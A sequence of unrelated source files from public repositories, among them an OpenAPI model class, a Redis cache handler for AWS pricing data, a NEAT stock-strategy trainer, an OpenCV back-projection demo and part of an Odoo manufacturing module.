    def __init__(self, value=None, atom_value_type=None, local_vars_configuration=None):  # noqa: E501
        """AtomValueString - a model defined in OpenAPI"

        :param value:  The value itself
        :type value: str
        :param atom_value_type:  The available values are: AtomValueInt, AtomValueDecimal, AtomValueString, AtomValue0D, AtomValue (required)
        :type atom_value_type: str

        """  # noqa: E501
        if local_vars_configuration is None:
            local_vars_configuration = Configuration.get_default_copy()
        self.local_vars_configuration = local_vars_configuration

        self._value = None
        self._atom_value_type = None
        self.discriminator = None

        # Assign through the property setters so validation applies
        self.value = value
        self.atom_value_type = atom_value_type

    @property
    def value(self):
        """Gets the value of this AtomValueString.  # noqa: E501

        The value itself  # noqa: E501

        :return: The value of this AtomValueString.  # noqa: E501
        :rtype: str
        """
        return self._value

    @value.setter
    def value(self, value):
        """Sets the value of this AtomValueString.

        The value itself  # noqa: E501

        :param value: The value of this AtomValueString.  # noqa: E501
        :type value: str
        """

        self._value = value

    @property
    def atom_value_type(self):
        """Gets the atom_value_type of this AtomValueString.  # noqa: E501

        The available values are: AtomValueInt, AtomValueDecimal, AtomValueString, AtomValue0D, AtomValue  # noqa: E501

        :return: The atom_value_type of this AtomValueString.  # noqa: E501
        :rtype: str
        """
        return self._atom_value_type

    @atom_value_type.setter
    def atom_value_type(self, atom_value_type):
        """Sets the atom_value_type of this AtomValueString.

        The available values are: AtomValueInt, AtomValueDecimal, AtomValueString, AtomValue0D, AtomValue  # noqa: E501

        :param atom_value_type: The atom_value_type of this AtomValueString.  # noqa: E501
        :type atom_value_type: str
        """
        # Required field: reject None, then restrict to the discriminator values
        if self.local_vars_configuration.client_side_validation and atom_value_type is None:  # noqa: E501
            raise ValueError("Invalid value for `atom_value_type`, must not be `None`")  # noqa: E501
        allowed_values = ["AtomValueInt", "AtomValueDecimal", "AtomValueString", "AtomValue0D", "AtomValue"]  # noqa: E501
        if self.local_vars_configuration.client_side_validation and atom_value_type not in allowed_values:  # noqa: E501
            raise ValueError(
                "Invalid value for `atom_value_type` ({0}), must be one of {1}"  # noqa: E501
                .format(atom_value_type, allowed_values)
            )

        self._atom_value_type = atom_value_type

    def to_dict(self, serialize=False):
        """Returns the model properties as a dict"""
        result = {}

        # Recursively convert nested models; when serialize=True and the
        # nested to_dict accepts it, propagate the flag
        def convert(x):
            if hasattr(x, "to_dict"):
                args = getfullargspec(x.to_dict).args
                if len(args) == 1:
                    return x.to_dict()
                else:
                    return x.to_dict(serialize)
            else:
                return x

        for attr, _ in six.iteritems(self.openapi_types):
            value = getattr(self, attr)
            # With serialize=True use the JSON key names instead of attribute names
            attr = self.attribute_map.get(attr, attr) if serialize else attr
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: convert(x),
                    value
                ))
            elif isinstance(value, dict):
                result[attr] = dict(map(
                    lambda item: (item[0], convert(item[1])),
                    value.items()
                ))
            else:
                result[attr] = convert(value)

        return result

    def to_str(self):
        """Returns the string representation of the model"""
        return pprint.pformat(self.to_dict())

    def __repr__(self):
        """For `print` and `pprint`"""
        return self.to_str()

    def __eq__(self, other):
        """Returns true if both objects are equal"""
        if not isinstance(other, AtomValueString):
            return False

        return self.to_dict() == other.to_dict()

    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        if not isinstance(other, AtomValueString):
            return True

        return self.to_dict() != other.to_dict()
b8f7ba0dc35228c56b0d49a71cb8615c94f9c208 | 1,164 | py | Python | test/vanilla/Expected/AcceptanceTests/ModelFlattening/setup.py | amrElroumy/autorest.python | b37af1779f6d53b4fa0d92da62151f8133006f98 | [
"MIT"
] | null | null | null | test/vanilla/Expected/AcceptanceTests/ModelFlattening/setup.py | amrElroumy/autorest.python | b37af1779f6d53b4fa0d92da62151f8133006f98 | [
"MIT"
] | null | null | null | test/vanilla/Expected/AcceptanceTests/ModelFlattening/setup.py | amrElroumy/autorest.python | b37af1779f6d53b4fa0d92da62151f8133006f98 | [
"MIT"
] | null | null | null | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
# coding: utf-8
from setuptools import setup, find_packages
NAME = "autorestresourceflatteningtestservice"
VERSION = "0.1.0"
# To install the library, run the following
#
# python setup.py install
#
# prerequisite: setuptools
# http://pypi.python.org/pypi/setuptools
REQUIRES = ["msrest>=0.6.18", "azure-core<2.0.0,>=1.8.2"]
# Register the generated AutoRest client package with setuptools.
setup(
    name=NAME,
    version=VERSION,
    description="AutoRestResourceFlatteningTestService",
    author_email="",
    url="",
    keywords=["Swagger", "AutoRestResourceFlatteningTestService"],
    install_requires=REQUIRES,
    packages=find_packages(),
    include_package_data=True,
    long_description="""\
    Resource Flattening for AutoRest.
    """,
)
1854aa0c272e66350d639503e53394931cd7f51a | 572 | py | Python | doc/integrations/pytorch/parlai/zoo/image_chat/transresnet_multimodal.py | novium258/cortx-1 | ce5b939b33b8d24d89b31807ac3bcaa8f24096bc | [
"Apache-2.0"
] | 1 | 2020-09-27T05:00:06.000Z | 2020-09-27T05:00:06.000Z | doc/integrations/pytorch/parlai/zoo/image_chat/transresnet_multimodal.py | novium258/cortx-1 | ce5b939b33b8d24d89b31807ac3bcaa8f24096bc | [
"Apache-2.0"
] | 1 | 2021-08-04T11:17:39.000Z | 2021-08-04T11:17:39.000Z | doc/integrations/pytorch/parlai/zoo/image_chat/transresnet_multimodal.py | novium258/cortx-1 | ce5b939b33b8d24d89b31807ac3bcaa8f24096bc | [
"Apache-2.0"
] | 1 | 2021-05-03T13:27:14.000Z | 2021-05-03T13:27:14.000Z | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
"""
Pretrained Transresnet Multimodal model on the Image-Chat task.
"""
from parlai.core.build_data import download_models
def download(datapath):
    """Fetch the pretrained Transresnet Multimodal archive for Image-Chat.

    The archive is unpacked under ``datapath`` by ParlAI's model downloader.
    """
    options = {'datapath': datapath, 'model_type': 'transresnet_multimodal'}
    archives = ['transresnet_multimodal.tgz']
    download_models(options, archives, 'image_chat')
| 28.6 | 73 | 0.699301 |
fb824ba6936f7dc99213ac80caeb082489a2cdb0 | 8,051 | py | Python | sethji/model/redis_handler.py | rohit01/aws-price-umbrella | 109e94282ba94cf9c457887851109c2ff6333e99 | [
"MIT"
] | null | null | null | sethji/model/redis_handler.py | rohit01/aws-price-umbrella | 109e94282ba94cf9c457887851109c2ff6333e99 | [
"MIT"
] | null | null | null | sethji/model/redis_handler.py | rohit01/aws-price-umbrella | 109e94282ba94cf9c457887851109c2ff6333e99 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -
#
import gevent
import gevent.monkey
gevent.monkey.patch_all()
import redis
import time
# Module-level Redis connection pool shared by every RedisHandler instance;
# created lazily by the first RedisHandler that is constructed.
connection_pool = None
class RedisHandler(object):
    """Redis accessor that namespaces cached AWS inventory objects.

    All instances share the module-level ``connection_pool`` (created lazily
    by the first instance). Construction also spawns a gevent greenlet that
    closes server-side client connections idle longer than ``idle_timeout``.

    NOTE(review): Python 2 code -- the ``print`` statement and the
    ``keys()``/``sort()`` usage in ``_close_idle_connections`` are not
    Python 3 compatible.
    """
    def __init__(self, host=None, port=None, password=None, idle_timeout=None):
        # host/port default to a local Redis (127.0.0.1:6379); idle_timeout
        # (seconds) is the reap threshold used by _close_idle_connections.
        global connection_pool
        if host is None:
            host = '127.0.0.1'
        if port is None:
            port = 6379
        if not connection_pool:
            connection_pool = redis.ConnectionPool(host=host, port=port,
                                                   password=password)
        self.connection = redis.StrictRedis(connection_pool=connection_pool)
        self.idle_timeout = idle_timeout
        # Key-prefix layout for each cached AWS object type.
        self.instance_hash_prefix = 'aws:ec2:instance'         ## Suffix: region, instance id
        self.ebs_vol_hash_prefix = 'aws:ec2:ebs:vol'           ## Suffix: region, volume id
        self.ebs_snapshot_hash_prefix = 'aws:ec2:ebs:snap'     ## Suffix: region, snapshot id
        self.elb_hash_prefix = 'aws:ec2:elb'                   ## Suffix: region, elb name
        self.elastic_ip_hash_prefix = 'aws:ec2:elastic_ip'     ## Suffix: ip_address
        self.index_prefix = 'aws:index'                        ## Suffix: index_item
        self.all_tags_hash = 'sethji:indexed_tags'             ## No Suffix
        self.sync_lock_hash = 'sethji:sync_lock'               ## No Suffix
        self.last_sync_time_hash = 'sethji:last_sync_time'     ## No Suffix
        self.object_cache_hash = 'sethji:object_cache'         ## object path
        # Fire-and-forget reaper for idle client connections.
        gevent.spawn_raw(self._close_idle_connections)
    # ---- generic object cache (rendered pages / computed blobs) ----
    def get_cached_object(self, path):
        # Returns the cached blob for `path`, or None when absent/expired.
        hash_key = "%s:%s" % (self.object_cache_hash, path)
        return self.connection.get(hash_key)
    def set_object_cache(self, path, content, expire_duration):
        # Stores `content` under the cache namespace; a falsy
        # expire_duration means the entry never expires.
        hash_key = "%s:%s" % (self.object_cache_hash, path)
        self.connection.set(hash_key, content)
        if expire_duration:
            self.connection.expire(hash_key, expire_duration)
    # ---- sync bookkeeping ----
    def set_last_sync_time(self):
        # Records "now" (epoch seconds) as the last successful sync time.
        time_now = int(round(time.time()))
        return self.connection.set(self.last_sync_time_hash, time_now)
    def get_last_sync_time(self):
        return self.connection.get(self.last_sync_time_hash)
    def set_sync_lock(self, timeout=None):
        # timeout <= 0 (or None) releases the lock; otherwise the lock is
        # set to the current timestamp and auto-expires after `timeout`s.
        if (not timeout) or (timeout <= 0):
            return self.connection.delete(self.sync_lock_hash)
        time_now = int(round(time.time()))
        return self.connection.set(self.sync_lock_hash, time_now, ex=timeout)
    def get_sync_lock(self):
        return self.connection.get(self.sync_lock_hash)
    # ---- EC2 instances ----
    def save_instance_details(self, item_details):
        # item_details must contain 'region' and 'instance_id'; the whole
        # dict is stored as a Redis hash. Returns (key, hmset status).
        hash_key = "%s:%s:%s" % (self.instance_hash_prefix,
                                 item_details['region'],
                                 item_details['instance_id'])
        status = self.connection.hmset(hash_key, item_details)
        return (hash_key, status)
    def get_instance_details(self, region, instance_id):
        hash_key = "%s:%s:%s" % (self.instance_hash_prefix, region, instance_id)
        return self.connection.hgetall(hash_key)
    def get_elastic_ip_details(self, elastic_ip):
        hash_key = "%s:%s" % (self.elastic_ip_hash_prefix, elastic_ip)
        return self.connection.hgetall(hash_key)
    def add_instance_detail(self, region, instance_id, key, value):
        # Sets a single field on an instance hash. Returns (key, hset status).
        hash_key = "%s:%s:%s" % (self.instance_hash_prefix, region,
                                 instance_id)
        status = self.connection.hset(hash_key, key, value)
        return (hash_key, status)
    def get_instance_item_value(self, region, instance_id, key):
        hash_key = "%s:%s:%s" % (self.instance_hash_prefix, region,
                                 instance_id)
        return self.connection.hget(hash_key, key)
    # ---- ELBs ----
    def save_elb_details(self, item_details):
        # item_details must contain 'region' and 'elb_name'.
        hash_key = "%s:%s:%s" % (self.elb_hash_prefix,
                                 item_details['region'],
                                 item_details['elb_name'])
        status = self.connection.hmset(hash_key, item_details)
        return (hash_key, status)
    def get_elb_details(self, region, elb_name):
        hash_key = "%s:%s:%s" % (self.elb_hash_prefix, region, elb_name)
        return self.connection.hgetall(hash_key)
    # ---- EBS volumes and snapshots ----
    def save_ebs_vol_details(self, item_details):
        # item_details must contain 'region' and 'volume_id'.
        hash_key = "%s:%s:%s" % (self.ebs_vol_hash_prefix,
                                 item_details['region'],
                                 item_details['volume_id'])
        status = self.connection.hmset(hash_key, item_details)
        return (hash_key, status)
    def get_ebs_volume_details(self, region, volume_id):
        hash_key = "%s:%s:%s" % (self.ebs_vol_hash_prefix, region, volume_id)
        return self.connection.hgetall(hash_key)
    def save_ebs_snapshot_details(self, item_details):
        # item_details must contain 'region' and 'snapshot_id'.
        hash_key = "%s:%s:%s" % (self.ebs_snapshot_hash_prefix,
                                 item_details['region'],
                                 item_details['snapshot_id'])
        status = self.connection.hmset(hash_key, item_details)
        return (hash_key, status)
    def get_ebs_snapshot_details(self, region, snapshot_id):
        hash_key = "%s:%s:%s" % (self.ebs_snapshot_hash_prefix, region,
                                 snapshot_id)
        return self.connection.hgetall(hash_key)
    # ---- tag index ----
    def save_indexed_tags(self, indexed_tags):
        # Replaces/merges the flat hash of indexed tag names -> values.
        status = self.connection.hmset(self.all_tags_hash, indexed_tags)
        return (self.all_tags_hash, status)
    def get_indexed_tags(self):
        return self.connection.hgetall(self.all_tags_hash)
    # ---- elastic IPs ----
    def save_elastic_ip_details(self, item_details):
        # item_details must contain 'elastic_ip'.
        hash_key = "%s:%s" % (self.elastic_ip_hash_prefix,
                              item_details['elastic_ip'])
        status = self.connection.hmset(hash_key, item_details)
        return (hash_key, status)
    def get_details(self, hash_key):
        # Generic fetch for an already-fully-qualified hash key.
        return self.connection.hgetall(hash_key)
    # ---- plain key/value search index ----
    def save_index(self, key, value):
        hash_key = "%s:%s" % (self.index_prefix, key)
        status = self.connection.set(hash_key, value)
        return (hash_key, status)
    def expire_index(self, key, duration):
        hash_key = "%s:%s" % (self.index_prefix, key)
        return self.connection.expire(hash_key, duration)
    def get_index(self, key):
        hash_key = "%s:%s" % (self.index_prefix, key)
        return self.connection.get(hash_key)
    def exists(self, hash_key):
        return self.connection.exists(hash_key)
    def expire(self, hash_key, duration):
        return self.connection.expire(hash_key, duration)
    def cleanup_keys(self, valid_keys):
        # Deletes every cached AWS/object-cache key NOT listed in
        # valid_keys, i.e. records left over from a previous sync.
        hash_set = set([])
        hash_set.update(self.connection.keys("%s*" % self.instance_hash_prefix) or [])
        hash_set.update(self.connection.keys("%s*" % self.ebs_vol_hash_prefix) or [])
        hash_set.update(self.connection.keys("%s*" % self.ebs_snapshot_hash_prefix) or [])
        hash_set.update(self.connection.keys("%s*" % self.elb_hash_prefix) or [])
        hash_set.update(self.connection.keys("%s*" % self.elastic_ip_hash_prefix) or [])
        hash_set.update(self.connection.keys("%s*" % self.object_cache_hash) or [])
        hash_set.difference_update(set(valid_keys))
        if hash_set:
            self.connection.delete(*hash_set)
    def _close_idle_connections(self):
        # Kills server-side client connections whose idle time (seconds)
        # is >= self.idle_timeout, most-idle first.
        # NOTE(review): if idle_timeout is None, `idle_time < None` is
        # always False under Python 2, so EVERY connection is eligible --
        # confirm that is intended.
        client_list = self.connection.client_list()
        idle_connection_mapping = {}
        for client in client_list:
            idle_connection_mapping[int(client['idle'])] = client['addr']
        # Python 2: keys() returns a list; sorted most-idle first.
        idle_time_list = idle_connection_mapping.keys()
        idle_time_list.sort(reverse=True)
        for idle_time in idle_time_list:
            if idle_time < self.idle_timeout:
                break
            try:
                self.connection.client_kill(idle_connection_mapping[idle_time])
            except Exception as e:
                print "Exception while closing idle redis connection. " \
                      "Message: %s" % str(e.message)
| 37.446512 | 94 | 0.624146 |
4f43bbc1a9560b8517060d00c3eaa956317262a6 | 2,773 | py | Python | train.py | Reecer9714/NEATStocks | 3bdcaad29149eb14cefc10a8026a0fbf51f630b8 | [
"MIT"
] | null | null | null | train.py | Reecer9714/NEATStocks | 3bdcaad29149eb14cefc10a8026a0fbf51f630b8 | [
"MIT"
] | null | null | null | train.py | Reecer9714/NEATStocks | 3bdcaad29149eb14cefc10a8026a0fbf51f630b8 | [
"MIT"
] | null | null | null | import os
from functools import partial
from random import randint
import neat
import visualize
import multiprocessing
from config import *
from simulator import StockSimulator
from strategy import neat_strategy
# Module-level simulator pre-loaded with historical data for the configured
# ticker; shared by calc_fitness() across every genome evaluation.
simulator = StockSimulator().load_data(stock_ticker)
def calc_fitness(genome, config):
    """Run one genome's trading strategy over the most recent price window
    and return the simulator's profit-based fitness score."""
    total_days = len(simulator.stock_data)
    start = total_days - num_of_days_to_sim
    window = total_days - start
    # start = randint(num_of_days_to_lookback, total_days - num_of_days_to_sim)
    simulator.reset_sim()
    network = neat.nn.FeedForwardNetwork.create(genome, config)
    strategy = partial(neat_strategy, network)
    simulator.sim_strategy(strategy, start, window)
    score, _ = simulator.evaluate()
    return score
def run(config_file, reporter=None):
    """Evolve a NEAT population against the stock simulator and report the winner.

    :param config_file: path to the NEAT configuration file.
    :param reporter: optional progress reporter attached to the population.
        Defaults to a fresh ``neat.StdOutReporter(True)`` created per call.
        (Bug fix: the previous ``reporter=neat.StdOutReporter(True)`` default
        was evaluated once at import time, so every call shared -- and import
        eagerly constructed -- a single reporter instance.)
    """
    if reporter is None:
        reporter = neat.StdOutReporter(True)
    # Load configuration.
    config = neat.Config(neat.DefaultGenome, neat.DefaultReproduction,
                         neat.DefaultSpeciesSet, neat.DefaultStagnation,
                         config_file)
    # Create the population, which is the top-level object for a NEAT run.
    p = neat.Population(config)
    # Resume from a saved checkpoint when one exists next to this script.
    checkpoint_path = os.path.join(os.path.dirname(__file__), 'checkpoints/{}'.format(starting_checkpoint))
    if os.path.exists(checkpoint_path):
        p = neat.Checkpointer.restore_checkpoint(checkpoint_path)
    # Progress reporting, statistics and periodic checkpointing.
    p.add_reporter(reporter)
    stats = neat.StatisticsReporter()
    p.add_reporter(stats)
    p.add_reporter(neat.Checkpointer(
        checkpoint_generations, filename_prefix='checkpoints/{}-checkpoint-'.format(stock_ticker)))
    # Evaluate genomes in parallel across all available CPU cores.
    pe = neat.ParallelEvaluator(multiprocessing.cpu_count(), calc_fitness)
    winner = p.run(pe.evaluate, num_of_generations)
    # Re-simulate the winning genome over the final window to measure results.
    net = neat.nn.FeedForwardNetwork.create(winner, config)
    genome_strategy = partial(neat_strategy, net)
    simulator.sim_strategy(genome_strategy, len(simulator.stock_data)-num_of_days_to_sim, num_of_days_to_sim)
    profit, avg_loss = simulator.evaluate()
    # Display the winning genome.
    print('\nBest genome Profit({}) AvgLoss({}):\n{}'.format(profit-1, avg_loss-1, winner))
    visualize.draw_net(config, winner, view=True, node_names=node_names, show_disabled=False)
    # stats_fig = visualize.plot_stats(stats, ylog=False, view=True)
    # visualize.plot_species(stats, view=False)
if __name__ == '__main__':
    # Resolve the configuration file relative to this script so the
    # program runs correctly from any working directory.
    script_dir = os.path.dirname(__file__)
    run(os.path.join(script_dir, config_file))
| 40.188406 | 109 | 0.744681 |
d28ca8914568a48d0eb5e60447bd90c6dcbfb22c | 1,084 | py | Python | run_models.py | AineKiraboMbabazi/AIPND_Image_Classifier | 7289adc5f1e811bf09144bd31dbb7c010a27dbc5 | [
"MIT"
] | null | null | null | run_models.py | AineKiraboMbabazi/AIPND_Image_Classifier | 7289adc5f1e811bf09144bd31dbb7c010a27dbc5 | [
"MIT"
] | null | null | null | run_models.py | AineKiraboMbabazi/AIPND_Image_Classifier | 7289adc5f1e811bf09144bd31dbb7c010a27dbc5 | [
"MIT"
] | null | null | null | #!/bin/sh
# */home/workspace/Image classifier/run_models.sh
#
# PROGRAMMER: Ainekirabo Mbabazi
# DATE CREATED: 06/12/2019
# PURPOSE: Runs all three models
#
#
# Usage: sh run_models.sh -- will run program from commandline
#
# Each train/predict pair below trains one architecture on the `flowers`
# dataset (saving its checkpoint) and then predicts the top 5 classes for
# the same test image from that checkpoint. All runs use the GPU, learning
# rate 0.001, 1000 hidden units and 5 epochs.
# Model 1: VGG13 -> checkpoint.pth
python train.py flowers --save_dir checkpoint.pth --arch vgg13 --learning_rate 0.001 --hidden_units 1000 --epochs 5 --gpu
python predict.py 'flowers/test/28/image_05230.jpg' checkpoint.pth --top_k 5 --category_names cat_to_name.json --gpu
# Model 2: DenseNet201 -> checkpoint_1.pth
python train.py flowers --save_dir checkpoint_1.pth --arch 'densenet201' --learning_rate 0.001 --hidden_units 1000 --epochs 5 --gpu
python predict.py 'flowers/test/28/image_05230.jpg' checkpoint_1.pth --top_k 5 --category_names cat_to_name.json --gpu
# Model 3: AlexNet -> checkpoint_.pth
python train.py flowers --save_dir checkpoint_.pth --arch 'alexnet' --learning_rate 0.001 --hidden_units 1000 --epochs 5 --gpu
python predict.py 'flowers/test/28/image_05230.jpg' checkpoint_.pth --top_k 5 --category_names cat_to_name.json --gpu
| 57.052632 | 133 | 0.678967 |
766d4d8ea03c51ba4a9a0c1f137f2074d1d0c2f5 | 1,058 | py | Python | opencv/misc/slides/hist/backproj/backproj.py | SSG-DRD-IOT/commercial-iot-security-system | 0c3d89b35d0468d4d3cc5ce2653b3f0ac82652a9 | [
"MIT"
] | null | null | null | opencv/misc/slides/hist/backproj/backproj.py | SSG-DRD-IOT/commercial-iot-security-system | 0c3d89b35d0468d4d3cc5ce2653b3f0ac82652a9 | [
"MIT"
] | null | null | null | opencv/misc/slides/hist/backproj/backproj.py | SSG-DRD-IOT/commercial-iot-security-system | 0c3d89b35d0468d4d3cc5ce2653b3f0ac82652a9 | [
"MIT"
] | 3 | 2022-01-22T05:02:41.000Z | 2022-03-31T08:13:06.000Z |
import cv2
import numpy as np

# Histogram back-projection demo: model the colour distribution of one
# mountain image (mtn1.jpg) and highlight similarly coloured pixels in a
# second image (mtn2_lo.jpg).

roi = cv2.imread('mtn1.jpg')
hsv = cv2.cvtColor(roi, cv2.COLOR_BGR2HSV)

target = cv2.imread('mtn2_lo.jpg')
hsvt = cv2.cvtColor(target, cv2.COLOR_BGR2HSV)

# Calculate the model histogram over Hue (0-179) and Saturation (0-255).
# Fix: the original built a `mask` array (region 766,302 - 1617,1000 set to
# 255) but never passed it anywhere -- calcHist received None -- so the dead
# allocation is removed. To restrict the model to that sub-region, pass a
# single-channel mask as the third argument instead of None.
roihist = cv2.calcHist([hsv], [0, 1], None, [180, 256], [0, 180, 0, 256])

# Normalize the histogram and apply back-projection onto the target image.
cv2.normalize(roihist, roihist, 0, 255, cv2.NORM_MINMAX)
dst = cv2.calcBackProject([hsvt], [0, 1], roihist, [0, 180, 0, 256], 1)

# Convolve with a circular disk to smooth the back-projection in place.
disk = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (5, 5))
cv2.filter2D(dst, -1, disk, dst)

# threshold and binary AND (kept from the original experiment):
# ret, thresh = cv2.threshold(dst, 50, 255, 0)
# thresh = cv2.merge((thresh, thresh, thresh))
# res = cv2.bitwise_and(target, thresh)
# cv2.imshow('dist', dst)
cv2.imwrite('dst.jpg', dst)
cv2.imwrite('hist.jpg', roihist)
# res = np.vstack((target, thresh, res))
# cv2.imwrite('res.jpg', res)
| 30.228571 | 73 | 0.695652 |
2a597336a7836b14670691059e68aa614c04ff7b | 68,811 | py | Python | web/addons/mrp/mrp.py | diogocs1/comps | 63df07f6cf21c41e4527c06e2d0499f23f4322e7 | [
"Apache-2.0"
] | null | null | null | web/addons/mrp/mrp.py | diogocs1/comps | 63df07f6cf21c41e4527c06e2d0499f23f4322e7 | [
"Apache-2.0"
] | null | null | null | web/addons/mrp/mrp.py | diogocs1/comps | 63df07f6cf21c41e4527c06e2d0499f23f4322e7 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
import openerp.addons.decimal_precision as dp
from openerp.osv import fields, osv, orm
from openerp.tools import DEFAULT_SERVER_DATETIME_FORMAT
from openerp.tools import float_compare
from openerp.tools.translate import _
from openerp import tools, SUPERUSER_ID
from openerp.addons.product import _common
class mrp_property_group(osv.osv):
    """
    Group of mrp properties.

    Simple classification table: each mrp.property record points to one of
    these groups through its ``group_id`` field.
    """
    _name = 'mrp.property.group'
    _description = 'Property Group'
    _columns = {
        'name': fields.char('Property Group', required=True),
        'description': fields.text('Description'),
    }
class mrp_property(osv.osv):
    """
    Properties of mrp.

    Properties tag bills of material so procurement can select the most
    suitable BoM (see mrp_bom._bom_find, which matches on property_ids).
    """
    _name = 'mrp.property'
    _description = 'Property'
    _columns = {
        'name': fields.char('Name', required=True),
        # Informational only -- never used in any computation (see help).
        'composition': fields.selection([('min','min'),('max','max'),('plus','plus')], 'Properties composition', required=True, help="Not used in computations, for information purpose only."),
        'group_id': fields.many2one('mrp.property.group', 'Property Group', required=True),
        'description': fields.text('Description'),
    }
    _defaults = {
        'composition': lambda *a: 'min',
    }
#----------------------------------------------------------
# Work Centers
#----------------------------------------------------------
# capacity_hour : capacity per hour. default: 1.0.
# Eg: If 5 concurrent operations at one time: capacity = 5 (because 5 employees)
# unit_per_cycle : how many units are produced for one cycle
class mrp_workcenter(osv.osv):
    """A production resource: capacity, timing and costing information."""
    _name = 'mrp.workcenter'
    _description = 'Work Center'
    # Delegation inheritance: each work center owns a resource.resource
    # record (via resource_id) that supplies name, calendar, efficiency, ...
    _inherits = {'resource.resource':"resource_id"}
    _columns = {
        'note': fields.text('Description', help="Description of the Work Center. Explain here what's a cycle according to this Work Center."),
        'capacity_per_cycle': fields.float('Capacity per Cycle', help="Number of operations this Work Center can do in parallel. If this Work Center represents a team of 5 workers, the capacity per cycle is 5."),
        'time_cycle': fields.float('Time for 1 cycle (hour)', help="Time in hours for doing one cycle."),
        'time_start': fields.float('Time before prod.', help="Time in hours for the setup."),
        'time_stop': fields.float('Time after prod.', help="Time in hours for the cleaning."),
        'costs_hour': fields.float('Cost per hour', help="Specify Cost of Work Center per hour."),
        'costs_hour_account_id': fields.many2one('account.analytic.account', 'Hour Account', domain=[('type','!=','view')],
            help="Fill this only if you want automatic analytic accounting entries on production orders."),
        'costs_cycle': fields.float('Cost per cycle', help="Specify Cost of Work Center per cycle."),
        'costs_cycle_account_id': fields.many2one('account.analytic.account', 'Cycle Account', domain=[('type','!=','view')],
            help="Fill this only if you want automatic analytic accounting entries on production orders."),
        'costs_journal_id': fields.many2one('account.analytic.journal', 'Analytic Journal'),
        'costs_general_account_id': fields.many2one('account.account', 'General Account', domain=[('type','!=','view')]),
        'resource_id': fields.many2one('resource.resource','Resource', ondelete='cascade', required=True),
        'product_id': fields.many2one('product.product','Work Center Product', help="Fill this product to easily track your production costs in the analytic accounting."),
    }
    _defaults = {
        'capacity_per_cycle': 1.0,
        'resource_type': 'material',
    }
    def on_change_product_cost(self, cr, uid, ids, product_id, context=None):
        """Onchange: copy the selected product's standard price into costs_hour."""
        value = {}
        if product_id:
            cost = self.pool.get('product.product').browse(cr, uid, product_id, context=context)
            value = {'costs_hour': cost.standard_price}
        return {'value': value}
class mrp_routing(osv.osv):
    """
    For specifying the routings of Work Centers.

    A routing is the ordered list of work-center operations
    (mrp.routing.workcenter lines) needed to manufacture a product.
    """
    _name = 'mrp.routing'
    _description = 'Routing'
    _columns = {
        'name': fields.char('Name', required=True),
        'active': fields.boolean('Active', help="If the active field is set to False, it will allow you to hide the routing without removing it."),
        'code': fields.char('Code', size=8),
        'note': fields.text('Description'),
        'workcenter_lines': fields.one2many('mrp.routing.workcenter', 'routing_id', 'Work Centers', copy=True),
        'location_id': fields.many2one('stock.location', 'Production Location',
            help="Keep empty if you produce at the location where the finished products are needed." \
                "Set a location if you produce at a fixed location. This can be a partner location " \
                "if you subcontract the manufacturing operations."
        ),
        'company_id': fields.many2one('res.company', 'Company'),
    }
    _defaults = {
        'active': lambda *a: 1,
        'company_id': lambda self, cr, uid, context: self.pool.get('res.company')._company_default_get(cr, uid, 'mrp.routing', context=context)
    }
class mrp_routing_workcenter(osv.osv):
    """
    Defines working cycles and hours of a Work Center using routings.

    One line = one operation of a routing, consumed by
    mrp_bom._bom_explode to plan work-center loads and costs.
    """
    _name = 'mrp.routing.workcenter'
    _description = 'Work Center Usage'
    _order = 'sequence'
    _columns = {
        'workcenter_id': fields.many2one('mrp.workcenter', 'Work Center', required=True),
        'name': fields.char('Name', required=True),
        'sequence': fields.integer('Sequence', help="Gives the sequence order when displaying a list of routing Work Centers."),
        'cycle_nbr': fields.float('Number of Cycles', required=True,
            help="Number of iterations this work center has to do in the specified operation of the routing."),
        'hour_nbr': fields.float('Number of Hours', required=True, help="Time in hours for this Work Center to achieve the operation of the specified routing."),
        'routing_id': fields.many2one('mrp.routing', 'Parent Routing', select=True, ondelete='cascade',
             help="Routing indicates all the Work Centers used, for how long and/or cycles." \
                "If Routing is indicated then,the third tab of a production order (Work Centers) will be automatically pre-completed."),
        'note': fields.text('Description'),
        'company_id': fields.related('routing_id', 'company_id', type='many2one', relation='res.company', string='Company', store=True, readonly=True),
    }
    _defaults = {
        'cycle_nbr': lambda *a: 1.0,
        'hour_nbr': lambda *a: 0.0,
    }
class mrp_bom(osv.osv):
    """
    Defines bills of material for a product.

    A BoM ties a product template (optionally one specific variant) to its
    component lines (mrp.bom.line) and an optional routing used to build it.
    """
    _name = 'mrp.bom'
    _description = 'Bill of Material'
    _inherit = ['mail.thread']
    _columns = {
        'name': fields.char('Name'),
        'code': fields.char('Reference', size=16),
        'active': fields.boolean('Active', help="If the active field is set to False, it will allow you to hide the bills of material without removing it."),
        'type': fields.selection([('normal', 'Normal'), ('phantom', 'Set')], 'BoM Type', required=True,
                help= "Set: When processing a sales order for this product, the delivery order will contain the raw materials, instead of the finished product."),
        'position': fields.char('Internal Reference', help="Reference to a position in an external plan."),
        'product_tmpl_id': fields.many2one('product.template', 'Product', domain="[('type', '!=', 'service')]", required=True),
        # When product_id is set the BoM only applies to that variant;
        # otherwise it applies to every variant of product_tmpl_id.
        'product_id': fields.many2one('product.product', 'Product Variant',
            domain="['&', ('product_tmpl_id','=',product_tmpl_id), ('type','!=', 'service')]",
            help="If a product variant is defined the BOM is available only for this product."),
